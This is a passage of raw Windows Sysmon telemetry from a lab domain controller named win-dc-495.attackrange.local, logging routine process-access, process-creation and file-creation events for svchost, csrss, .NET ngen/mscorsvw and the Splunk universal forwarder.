:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.104{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.104{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.104{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.104{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.104{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.104{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.104{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.104{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.104{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91FA-6005-4703-00000000A301}4536C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.104{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-91FA-6005-4703-00000000A301}4536C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:46.105{59A5CD1D-91FA-6005-4703-00000000A301}4536C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.979{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91FB-6005-5A03-00000000A301}3376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.979{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FB-6005-5A03-00000000A301}3376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.713{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FB-6005-5903-00000000A301}5008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.698{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91FB-6005-5903-00000000A301}5008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.698{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FB-6005-5903-00000000A301}5008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.667{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FB-6005-5803-00000000A301}2824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.651{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91FB-6005-5803-00000000A301}2824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.651{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FB-6005-5803-00000000A301}2824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:47.635{59A5CD1D-91FB-6005-5703-00000000A301}3088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\c10-0\Microsoft.ActiveDirectory.TRLParserInterop.dll2021-01-18 13:49:47.635 10341000x80000000000000007669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.573{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FB-6005-5703-00000000A301}3088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.573{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91FB-6005-5703-00000000A301}3088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.573{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FB-6005-5703-00000000A301}3088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.526{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FB-6005-5603-00000000A301}3232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.510{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91FB-6005-5603-00000000A301}3232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 